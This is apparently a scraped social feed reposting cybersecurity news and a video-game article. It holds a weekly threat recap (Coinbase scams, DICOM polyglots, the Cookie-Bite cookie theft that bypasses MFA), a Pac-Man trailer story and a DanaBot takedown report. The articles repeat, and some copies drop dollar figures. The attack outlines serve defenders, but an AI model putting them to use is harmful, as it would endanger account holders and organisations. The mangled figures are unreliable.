cryptocurrency exchange Coinbase revealed that it was the victim of a malicious attack perpetrated by unknown threat actors to breach its systems by bribing customer support agents in India and siphon funds from nearly 70,000 customers. According to Blockchain security firm SlowMist, Coinbase users have been the target of social engineering scams since the start of the year, bombarding with SMS messages claiming to be fake withdrawal requests and seeking their confirmation as part of a "sustained and organized scam campaign." The goal is to induce a false sense of urgency and trick them into calling a number, eventually convincing them to transfer the funds to a secure wallet with a seed phrase pre-generated by the attackers and ultimately drain the assets. It's assessed that the activities are primarily carried out by two groups: low-level skid attackers from the Com community and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'" Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of a massive outage caused by a faulty update issued by CrowdStrike in mid-July 2024, has been given the green light to pursue to its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia stating Delta can try to prove that CrowdStrike was grossly negligent by pushing a defective update to its Falcon software to customers. The update crashed 8.5 million Windows devices across the world. Crowdstrike previously claimed that the airline had rejected technical support offers both from itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay $45 million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023. Storm-1516 Uses AI-Generated Media to Spread Disinformation — The Russian influence operation known as Storm-1516 (aka CopyCop) sought to spread narratives that undermined the European support for Ukraine by amplifying fabricated stories on X about European leaders using drugs while traveling by train to Kyiv for peace talks. One of the posts was subsequently shared by Russian state media and Maria Zakharova, a senior official in Russia's foreign ministry, as part of what has been described as a coordinated disinformation campaign by EclecticIQ. The activity is also notable for the use of synthetic content depicting French President Emmanuel Macron, U.K. Labour Party leader Keir Starmer, and German chancellor Friedrich Merz of drug possession during their return from Ukraine. "By attacking the reputation of these leaders, the campaign likely aimed to turn their own voters against them, using influence operations (IO) to reduce public support for Ukraine by discrediting the politicians who back it," the Dutch threat intelligence firm said. Turkish Users Targeted by DBatLoader — AhnLab has disclosed details of a malware campaign that's distributing a malware loader called DBatLoader (aka ModiLoader) via banking-themed banking emails, which then acts as a conduit to deliver SnakeKeylogger, an information stealer developed in .NET. "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processes (cmd.exe, powershell.exe, esentutl.exe, extrac32.exe) for behaviors such as file copying and changing policies," the company said. SEC SIM-Swapper Sentenced to 14 Months for SEC X Account Hack — A 26-year-old Alabama man, Eric Council Jr., has been sentenced to 14 months in prison and three years of supervised release for using SIM swapping attacks to breach the U.S. Securities and Exchange Commission's (SEC) official X account in January 2024 and falsely announced that the SEC approved Bitcoin (BTC) Exchange Traded Funds (ETFs). Council Jr. (aka Ronin, Agiantschnauzer, and @EasyMunny) was arrested in October 2024 and pleaded guilty to the crime earlier this February. He has also been ordered to forfeit $50,000. According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account." FBI Warns of Malicious Campaign Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) is warning of a new campaign that involves malicious actors impersonating senior U.S. federal or state government officials and their contacts to target individuals since April 2025. "The malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior US official in an effort to establish rapport before gaining access to personal accounts," the FBI said. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of transitioning to a separate messaging platform." From there, the actor may present malware or introduce hyperlinks that lead intended targets to an actor-controlled site that steals login information. DICOM Flaw Enables Attackers to Embed Malicious Code Within Medical Image Files — Praetorian has released a proof-of-concept (PoC) for a high-severity security flaw in Digital Imaging and Communications in Medicine (DICOM), predominant file format for medical images, that enables attackers to embed malicious code within legitimate medical image files. CVE-2019-11687 (CVSS score: 7.8), originally disclosed in 2019 by Markel Picado Ortiz, stems from a design decision that allows arbitrary content at the start of the file, otherwise called the Preamble, which enables the creation of malicious polyglots. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a much more potent threat. As mitigations, it's advised to implement a DICOM preamble whitelist. "DICOM's file structure inherently allows arbitrary bytes at the beginning of the file, where Linux and most operating systems will look for magic bytes," Praetorian researcher Ryan Hennessee said. "[The whitelist] would check a DICOM file's preamble before it is imported into the system. This would allow known good patterns, such as 'TIFF' magic bytes, or '\x00' null bytes, while files with the ELF magic bytes would be blocked." Cookie-Bite Attack Uses Chrome Extension to Steal Session Tokens — Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that employs custom-made malicious browser extensions to steal "ESTAUTH" and "ESTSAUTHPERSISTNT" cookies in Microsoft Azure Entra ID and bypass multi-factor authentication (MFA). The attack has multiple moving parts to it: A custom Chrome extension that monitors authentication events and captures cookies; a PowerShell script that automates the extension deployment and ensures persistence; an exfiltration mechanism to send the cookies to a remote collection point; and a complementary extension to inject the captured cookies into the attacker's browser. "Threat actors often use infostealers to extract authentication tokens directly from a victim's machine or buy them directly through darkness markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policies (CAPs) and maintain persistent access." Authentication cookies can also be stolen using adversary-in-the-middle (AitM) phishing kits in real-time, or using rogue browser extensions that request excessive permissions to interact with web sessions, modify page content, and extract stored authentication data. Once installed, the extension can access the browser's storage API, intercept network requests, or inject malicious JavaScript into active sessions to harvest real-time session cookies. "By leveraging stolen session cookies, an adversary can bypass authentication mechanisms, gaining seamless entry into cloud environments without requiring user credentials," Varonis said. "Beyond initial access, session hijacking can facilitate lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing permissions or misconfigured roles." 🎥 Cybersecurity Webinars Non-Human Identities: The AI Backdoor You're Not Watching → AI agents rely on Non-Human Identities (like service accounts and API keys) to function—but these are often left untracked and unsecured. As attackers shift focus to this hidden layer, the risk is growing fast. In this session, you'll learn how to find, secure, and monitor these identities before they're exploited. Join the webinar to understand the real risks behind AI adoption—and how to stay ahead. Inside the LOTS Playbook: How Hackers Stay Undetected → Attackers are using trusted sites to stay hidden. In this webinar, Zscaler experts share how they detect these stealthy LOTS attacks using insights from the world's largest security cloud. Join to learn how to spot hidden threats and improve your defense. 🔧 Cybersecurity Tools ScriptSentry → It is a free tool that scans your environment for dangerous logon script misconfigurations—like plaintext credentials, insecure file/share permissions, and references to non-existent servers. These overlooked issues can enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them across large Active Directory environments. Aftermath → It is a Swift-based, open-source tool for macOS incident response. It collects forensic data—like logs, browser activity, and process info—from compromised systems, then analyzes it to build timelines and track infection paths. Deploy via MDM or run manually. Fast, lightweight, and ideal for post-incident investigation. AI Red Teaming Playground Labs → It is an open-source training suite with hands-on challenges designed to teach security professionals how to red team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injections, safety bypasses, indirect attacks, and Responsible AI failures. Built on Chat Copilot and deployable via Docker, it's a practical resource for testing and understanding real-world AI vulnerabilities. 🔒 Tip of the Week Review and Revoke Old OAuth App Permissions — They're Silent Backdoor → You've likely logged into apps using "Continue with Google," "Sign in with Microsoft," or GitHub/Twitter/Facebook logins. That's OAuth. But did you know many of those apps still have access to your data long after you stop using them? Why it matters: Even if you delete the app or forget it existed, it might still have ongoing access to your calendar, email, cloud files, or contact list — no password needed. If that third-party gets breached, your data is at risk. What to do: Go through your connected apps here: Google: myaccount.google.com/permissions Microsoft: account.live.com/consent/Manage GitHub: github.com/settings/applications Facebook: facebook.com/settings?tab=applications Revoke anything you don't actively use. It's a fast, silent cleanup — and it closes doors you didn't know were open. Conclusion Looking ahead, it's not just about tracking threats—it's about understanding what they reveal. Every tactic used, every system tested, points to deeper issues in how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper awareness and faster response loops. The takeaways from this week aren't just technical—they speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to react, but to rethink what "secure" really needs to mean in today's environment. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.
    0 Комментарии 0 Поделились 0 предпросмотр
  • 'Shadow Labyrinth' Injects Some Pac-Man Nostalgia Into Its Latest Trailer

    Subscribe to Nintendo Life on YouTube813k
    Bandai Namco has released a new trailer for its upcoming Pac-Man re-imagining Shadow Labyrinth, and if previous glimpses of the game perhaps didn't convince you, then this latest effort may just bring you on board with its nostalgic elements.
    The new trailer showcases a series of mazes that look a lot more like the traditional Pac-Man experience you're perhaps more used to. There are a few interesting elements, mind you, including boost pads that speed Pac-Manalong a straight line, along with the ability to jump and bash into platforms, thus causing them to move or fall down.Subscribe to Nintendo Life on YouTube813kWatch on YouTube
    It's looking pretty sweet, and it's worth noting that this one is scheduled to launch on both the Switch and Switch 2, so we'd expect the latter to showcase some sizable performance upgrades.
    Whichever you opt to get, the game will launch on 18th July 2025. The core gameplay sees you take on the role of "The Swordsman", who must survive in a deadly world filled with fearsome creatures, all the while utilising Puck to gobble up enemies and gain vital upgrades.
    Images: Bandai Namco Entertainment

    Waka waka waka!

    Including a "Secret Edition"

    What are your thoughts on this one so far? Will you be picking up Shadow Labyrinth when it launches in July? Let us know with a comment.

    Related Games
    See Also

    Share:0
    0

    Nintendo Life’s resident horror fanatic, when he’s not knee-deep in Resident Evil and Silent Hill lore, Ollie likes to dive into a good horror book while nursing a lovely cup of tea. He also enjoys long walks and listens to everything from TOOL to Chuck Berry.

    Hold on there, you need to login to post a comment...

    Related Articles

    27 Upcoming Nintendo Switch 2 Games We're Excited For In 2025
    The very best Switch 2 games coming soon

    Nintendo Unveils Diddy Kong's Brand New Design
    Cap's off

    Shigeru Miyamoto Explains Why Donkey Kong Has Been Redesigned
    You want expressive? You got it

    Nintendo Apologises For "Error" With Mention Of Switch 2 VRR TV Support
    "The incorrect information was initially published"

    The First Review For Fantasy Life i: The Girl Who Steals Time Is In
    A fantasy score?
    #039shadow #labyrinth039 #injects #some #pacman
    'Shadow Labyrinth' Injects Some Pac-Man Nostalgia Into Its Latest Trailer
    Subscribe to Nintendo Life on YouTube813k Bandai Namco has released a new trailer for its upcoming Pac-Man re-imagining Shadow Labyrinth, and if previous glimpses of the game perhaps didn't convince you, then this latest effort may just bring you on board with its nostalgic elements. The new trailer showcases a series of mazes that look a lot more like the traditional Pac-Man experience you're perhaps more used to. There are a few interesting elements, mind you, including boost pads that speed Pac-Manalong a straight line, along with the ability to jump and bash into platforms, thus causing them to move or fall down.Subscribe to Nintendo Life on YouTube813kWatch on YouTube It's looking pretty sweet, and it's worth noting that this one is scheduled to launch on both the Switch and Switch 2, so we'd expect the latter to showcase some sizable performance upgrades. Whichever you opt to get, the game will launch on 18th July 2025. The core gameplay sees you take on the role of "The Swordsman", who must survive in a deadly world filled with fearsome creatures, all the while utilising Puck to gobble up enemies and gain vital upgrades. Images: Bandai Namco Entertainment Waka waka waka! Including a "Secret Edition" What are your thoughts on this one so far? Will you be picking up Shadow Labyrinth when it launches in July? Let us know with a comment. Related Games See Also Share:0 0 Nintendo Life’s resident horror fanatic, when he’s not knee-deep in Resident Evil and Silent Hill lore, Ollie likes to dive into a good horror book while nursing a lovely cup of tea. He also enjoys long walks and listens to everything from TOOL to Chuck Berry. Hold on there, you need to login to post a comment... Related Articles 27 Upcoming Nintendo Switch 2 Games We're Excited For In 2025 The very best Switch 2 games coming soon Nintendo Unveils Diddy Kong's Brand New Design Cap's off Shigeru Miyamoto Explains Why Donkey Kong Has Been Redesigned You want expressive? You got it Nintendo Apologises For "Error" With Mention Of Switch 2 VRR TV Support "The incorrect information was initially published" The First Review For Fantasy Life i: The Girl Who Steals Time Is In A fantasy score? #039shadow #labyrinth039 #injects #some #pacman
    WWW.NINTENDOLIFE.COM
    'Shadow Labyrinth' Injects Some Pac-Man Nostalgia Into Its Latest Trailer
    Subscribe to Nintendo Life on YouTube813k Bandai Namco has released a new trailer for its upcoming Pac-Man re-imagining Shadow Labyrinth, and if previous glimpses of the game perhaps didn't convince you, then this latest effort may just bring you on board with its nostalgic elements. The new trailer showcases a series of mazes that look a lot more like the traditional Pac-Man experience you're perhaps more used to. There are a few interesting elements, mind you, including boost pads that speed Pac-Man (or "Puck", as it's known here) along a straight line, along with the ability to jump and bash into platforms, thus causing them to move or fall down.Subscribe to Nintendo Life on YouTube813kWatch on YouTube It's looking pretty sweet, and it's worth noting that this one is scheduled to launch on both the Switch and Switch 2, so we'd expect the latter to showcase some sizable performance upgrades. Whichever you opt to get, the game will launch on 18th July 2025. The core gameplay sees you take on the role of "The Swordsman", who must survive in a deadly world filled with fearsome creatures, all the while utilising Puck to gobble up enemies and gain vital upgrades. Images: Bandai Namco Entertainment Waka waka waka! Including a "Secret Edition" What are your thoughts on this one so far? Will you be picking up Shadow Labyrinth when it launches in July? Let us know with a comment. Related Games See Also Share:0 0 Nintendo Life’s resident horror fanatic, when he’s not knee-deep in Resident Evil and Silent Hill lore, Ollie likes to dive into a good horror book while nursing a lovely cup of tea. He also enjoys long walks and listens to everything from TOOL to Chuck Berry. Hold on there, you need to login to post a comment... Related Articles 27 Upcoming Nintendo Switch 2 Games We're Excited For In 2025 The very best Switch 2 games coming soon Nintendo Unveils Diddy Kong's Brand New Design Cap's off Shigeru Miyamoto Explains Why Donkey Kong Has Been Redesigned You want expressive? You got it Nintendo Apologises For "Error" With Mention Of Switch 2 VRR TV Support "The incorrect information was initially published" The First Review For Fantasy Life i: The Girl Who Steals Time Is In A fantasy score?
    0 Комментарии 0 Поделились 0 предпросмотр
  • U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation

    The U.S. Department of Justiceon Thursday announced the disruption of the online infrastructure associated with DanaBotand unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization.
    The malware, the DoJ said, infected more than 300,000 victim computers around the world, facilitated fraud and ransomware, and caused at least million in damages. Two of the defendants, Aleksandr Stepanov, 39, and Artem Aleksandrovich Kalinkin, 34, both from Novosibirsk, Russia, are currently at large.
    Stepanov has been charged with conspiracy, conspiracy to commit wire fraud and bank fraud, aggravated identity theft, unauthorized access to a protected computer to obtain information, unauthorized impairment of a protected computer, wiretapping, and use of an intercepted communication. Kalinkin has been charged with conspiracy to gain unauthorized access to a computer to obtain information, to gain unauthorized access to a computer to defraud, and to commit unauthorized impairment of a protected computer.
    The unsealed criminal complaint and indictment show that many of the defendants, counting Kalinkin, exposed their real-life identities after accidentally infecting their own systems with the malware.
    "In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware," the complaintread. "In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake."

    "The inadvertent infections often resulted in sensitive and compromising data being stolen from the actor's computer by the malware and stored on the DanaBot servers, including data that helped identify members of the DanaBot organization."
    If convicted, Kalinkin is expected to face a statutory maximum sentence of 72 years in federal prison. Stepanov would face a jail term of five years. Concurrent with the action, the law enforcement effort, carried out as part of Operation Endgame, saw DanaBot's command-and-controlservers seized, including dozens of virtual servers hosted in the United States.
    "DanaBot malware used a variety of methods to infect victim computers, including spam email messages containing malicious attachments or hyperlinks," the DoJ said. "Victim computers infected with DanaBot malware became part of a botnet, enabling the operators and users of the botnet to remotely control the infected computers in a coordinated manner."
    DanaBot, like the recently dismantled Lumma Stealer malware, operates under a malware-as-a-servicescheme, with the administrators leasing out access starting from to "several thousand dollars" a month. Tracked under the monikers Scully Spider and Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a delivery vector for next-stage payloads, such as ransomware.
    The Delphi-based modular malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information, user browsing histories, stored account credentials, and virtual currency wallet information. It can also provide full remote access, log keystrokes, and capture videos. It's been active in the wild since its debut in May 2018, when it started off as a banking trojan.
    Example of typical Danabot infrastructure
    "DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018," CrowdStrike said. "The malware's popularity grew due to its early modular development supporting Zeus-based web injects, information stealer capabilities, keystroke logging, screen recording, and hidden virtual network computingfunctionality."
    According to Black Lotus Labs and Team Cymru, DanaBot employs a layered communications infrastructure between a victim and the botnet controllers, wherein the C2 traffic is proxied through two or three server tiers before it reaches the final level. At least five to six tier-2 servers were active at any given time. A majority of DanaBot victims are concentrated around Brazil, Mexico, and the United States.
    "The operators have shown their commitment to their craft, adapted to detection and changes in enterprise defense, and with later iterations, insulating the C2s in tiers to obfuscate tracking," the companies said. "Throughout this time, they have made the bot more user-friendly with structured pricing and customer support."
    High-level diagram of multi-tiered C2 architecture
    The DoJ said DanaBot administrators operated a second version of the botnet that was specially designed to target victim computers in military, diplomatic, government, and related entities in North America and Europe. This variant, emerging in January 2021, came fitted with capabilities to record all interactions happening on a victim device and send the data to a different server.
    "Pervasive malware like DanaBot harms hundreds of thousands of victims around the world, including sensitive military, diplomatic, and government entities, and causes many millions of dollars in losses," said United States Attorney Bill Essayli for the Central District of California.
    The DoJ further credited several private sector firms, Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team Cymru, and Zscaler, for providing "valuable assistance."
    Some of the noteworthy aspects of DanaBot, compiled from various reports, are below -

    DanaBot's sub-botnet 5 received commands to download a Delphi-based executable leveraged to conduct HTTP-based distributed denial-of-serviceattacks against the Ukrainian Ministry of Defencewebmail server and the National Security and Defense Councilof Ukraine in March 2022, shortly after Russia's invasion of the country
    Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes likely with an aim to further intelligence-gathering activities on behalf of Russian government interests
    DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to dateThe malware's infrastructure consists of multiple components: A "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionalities, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication
    DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe
    The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers
    DanaBot's developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles
    DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025

    Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape.
    "Cybercriminal disruptions and law enforcement actions not only impair malware functionality and use but also impose a cost to threat actors by forcing them to change their tactics, cause mistrust in the criminal ecosystem, and potentially make criminals think about finding a different career," Selena Larson, a staff threat researcher at Proofpoint, said.

    "These successes against cyber criminals only come about when business IT teams and security service providers share much-needed insight into the biggest threats to society, affecting the greatest number of people around the world, which law enforcement can use to track down the servers, infrastructure, and criminal organizations behind the attacks. Private and public sector collaboration is crucial to knowing how actors operate and taking action against them."
    DanaBot's features as promoted on its support site
    DoJ Unseals Charges Against QakBot Leader
    The development comes as the DoJ unsealed charges against a 48-year-old Moscow resident, Rustam Rafailevich Gallyamo, for leading efforts to develop and maintain the QakBot malware, which was disrupted in a multinational operation in August 2023. The agency also filed a civil forfeiture complaint against over million in cryptocurrency seized from Gallyamov over the course of the investigation.
    "Gallyamov developed, deployed, and controlled the Qakbot malware beginning in 2008," the DoJ said. "From 2019 onward, Gallyamov allegedly used the Qakbot malware to infect thousands of victim computers around the world in order to establish a network, or 'botnet,' of infected computers."
    The DoJ revealed that, following the takedown, Gallyamov and his co-conspirators continued their criminal activities by switching to other tactics like "spam bomb" attacks in order to gain unauthorized access to victim networks and deploy ransomware families like Black Basta and CACTUS. Court documents accuse the e-crime group of engaging in these methods as recently as January 2025.
    "Mr. Gallyamov's bot network was crippled by the talented men and women of the FBI and our international partners in 2023, but he brazenly continued to deploy alternative methods to make his malware available to criminal cyber gangs conducting ransomware attacks against innocent victims globally," said Assistant Director in Charge Akil Davis of the FBI's Los Angeles Field Office.

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.
    #dismantles #danabot #malware #network #charges
    U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation
    The U.S. Department of Justiceon Thursday announced the disruption of the online infrastructure associated with DanaBotand unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more than 300,000 victim computers around the world, facilitated fraud and ransomware, and caused at least million in damages. Two of the defendants, Aleksandr Stepanov, 39, and Artem Aleksandrovich Kalinkin, 34, both from Novosibirsk, Russia, are currently at large. Stepanov has been charged with conspiracy, conspiracy to commit wire fraud and bank fraud, aggravated identity theft, unauthorized access to a protected computer to obtain information, unauthorized impairment of a protected computer, wiretapping, and use of an intercepted communication. Kalinkin has been charged with conspiracy to gain unauthorized access to a computer to obtain information, to gain unauthorized access to a computer to defraud, and to commit unauthorized impairment of a protected computer. The unsealed criminal complaint and indictment show that many of the defendants, counting Kalinkin, exposed their real-life identities after accidentally infecting their own systems with the malware. "In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware," the complaintread. "In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake." "The inadvertent infections often resulted in sensitive and compromising data being stolen from the actor's computer by the malware and stored on the DanaBot servers, including data that helped identify members of the DanaBot organization." If convicted, Kalinkin is expected to face a statutory maximum sentence of 72 years in federal prison. Stepanov would face a jail term of five years. Concurrent with the action, the law enforcement effort, carried out as part of Operation Endgame, saw DanaBot's command-and-controlservers seized, including dozens of virtual servers hosted in the United States. "DanaBot malware used a variety of methods to infect victim computers, including spam email messages containing malicious attachments or hyperlinks," the DoJ said. "Victim computers infected with DanaBot malware became part of a botnet, enabling the operators and users of the botnet to remotely control the infected computers in a coordinated manner." DanaBot, like the recently dismantled Lumma Stealer malware, operates under a malware-as-a-servicescheme, with the administrators leasing out access starting from to "several thousand dollars" a month. Tracked under the monikers Scully Spider and Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a delivery vector for next-stage payloads, such as ransomware. The Delphi-based modular malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information, user browsing histories, stored account credentials, and virtual currency wallet information. It can also provide full remote access, log keystrokes, and capture videos. It's been active in the wild since its debut in May 2018, when it started off as a banking trojan. Example of typical Danabot infrastructure "DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018," CrowdStrike said. "The malware's popularity grew due to its early modular development supporting Zeus-based web injects, information stealer capabilities, keystroke logging, screen recording, and hidden virtual network computingfunctionality." According to Black Lotus Labs and Team Cymru, DanaBot employs a layered communications infrastructure between a victim and the botnet controllers, wherein the C2 traffic is proxied through two or three server tiers before it reaches the final level. At least five to six tier-2 servers were active at any given time. A majority of DanaBot victims are concentrated around Brazil, Mexico, and the United States. "The operators have shown their commitment to their craft, adapted to detection and changes in enterprise defense, and with later iterations, insulating the C2s in tiers to obfuscate tracking," the companies said. "Throughout this time, they have made the bot more user-friendly with structured pricing and customer support." High-level diagram of multi-tiered C2 architecture The DoJ said DanaBot administrators operated a second version of the botnet that was specially designed to target victim computers in military, diplomatic, government, and related entities in North America and Europe. This variant, emerging in January 2021, came fitted with capabilities to record all interactions happening on a victim device and send the data to a different server. "Pervasive malware like DanaBot harms hundreds of thousands of victims around the world, including sensitive military, diplomatic, and government entities, and causes many millions of dollars in losses," said United States Attorney Bill Essayli for the Central District of California. The DoJ further credited several private sector firms, Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team Cymru, and Zscaler, for providing "valuable assistance." Some of the noteworthy aspects of DanaBot, compiled from various reports, are below - DanaBot's sub-botnet 5 received commands to download a Delphi-based executable leveraged to conduct HTTP-based distributed denial-of-serviceattacks against the Ukrainian Ministry of Defencewebmail server and the National Security and Defense Councilof Ukraine in March 2022, shortly after Russia's invasion of the country Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes likely with an aim to further intelligence-gathering activities on behalf of Russian government interests DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to dateThe malware's infrastructure consists of multiple components: A "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionalities, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers DanaBot's developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025 Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape. "Cybercriminal disruptions and law enforcement actions not only impair malware functionality and use but also impose a cost to threat actors by forcing them to change their tactics, cause mistrust in the criminal ecosystem, and potentially make criminals think about finding a different career," Selena Larson, a staff threat researcher at Proofpoint, said. "These successes against cyber criminals only come about when business IT teams and security service providers share much-needed insight into the biggest threats to society, affecting the greatest number of people around the world, which law enforcement can use to track down the servers, infrastructure, and criminal organizations behind the attacks. Private and public sector collaboration is crucial to knowing how actors operate and taking action against them." DanaBot's features as promoted on its support site DoJ Unseals Charges Against QakBot Leader The development comes as the DoJ unsealed charges against a 48-year-old Moscow resident, Rustam Rafailevich Gallyamo, for leading efforts to develop and maintain the QakBot malware, which was disrupted in a multinational operation in August 2023. The agency also filed a civil forfeiture complaint against over million in cryptocurrency seized from Gallyamov over the course of the investigation. "Gallyamov developed, deployed, and controlled the Qakbot malware beginning in 2008," the DoJ said. "From 2019 onward, Gallyamov allegedly used the Qakbot malware to infect thousands of victim computers around the world in order to establish a network, or 'botnet,' of infected computers." The DoJ revealed that, following the takedown, Gallyamov and his co-conspirators continued their criminal activities by switching to other tactics like "spam bomb" attacks in order to gain unauthorized access to victim networks and deploy ransomware families like Black Basta and CACTUS. Court documents accuse the e-crime group of engaging in these methods as recently as January 2025. "Mr. Gallyamov's bot network was crippled by the talented men and women of the FBI and our international partners in 2023, but he brazenly continued to deploy alternative methods to make his malware available to criminal cyber gangs conducting ransomware attacks against innocent victims globally," said Assistant Director in Charge Akil Davis of the FBI's Los Angeles Field Office. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. #dismantles #danabot #malware #network #charges
    THEHACKERNEWS.COM
    U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation
    The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more than 300,000 victim computers around the world, facilitated fraud and ransomware, and caused at least $50 million in damages. Two of the defendants, Aleksandr Stepanov (aka JimmBee), 39, and Artem Aleksandrovich Kalinkin (aka Onix), 34, both from Novosibirsk, Russia, are currently at large. Stepanov has been charged with conspiracy, conspiracy to commit wire fraud and bank fraud, aggravated identity theft, unauthorized access to a protected computer to obtain information, unauthorized impairment of a protected computer, wiretapping, and use of an intercepted communication. Kalinkin has been charged with conspiracy to gain unauthorized access to a computer to obtain information, to gain unauthorized access to a computer to defraud, and to commit unauthorized impairment of a protected computer. The unsealed criminal complaint and indictment show that many of the defendants, counting Kalinkin, exposed their real-life identities after accidentally infecting their own systems with the malware. "In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware," the complaint [PDF] read. "In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake." "The inadvertent infections often resulted in sensitive and compromising data being stolen from the actor's computer by the malware and stored on the DanaBot servers, including data that helped identify members of the DanaBot organization." If convicted, Kalinkin is expected to face a statutory maximum sentence of 72 years in federal prison. Stepanov would face a jail term of five years. Concurrent with the action, the law enforcement effort, carried out as part of Operation Endgame, saw DanaBot's command-and-control (C2) servers seized, including dozens of virtual servers hosted in the United States. "DanaBot malware used a variety of methods to infect victim computers, including spam email messages containing malicious attachments or hyperlinks," the DoJ said. "Victim computers infected with DanaBot malware became part of a botnet (a network of compromised computers), enabling the operators and users of the botnet to remotely control the infected computers in a coordinated manner." DanaBot, like the recently dismantled Lumma Stealer malware, operates under a malware-as-a-service (MaaS) scheme, with the administrators leasing out access starting from $500 to "several thousand dollars" a month. Tracked under the monikers Scully Spider and Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a delivery vector for next-stage payloads, such as ransomware. The Delphi-based modular malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information, user browsing histories, stored account credentials, and virtual currency wallet information. It can also provide full remote access, log keystrokes, and capture videos. It's been active in the wild since its debut in May 2018, when it started off as a banking trojan. 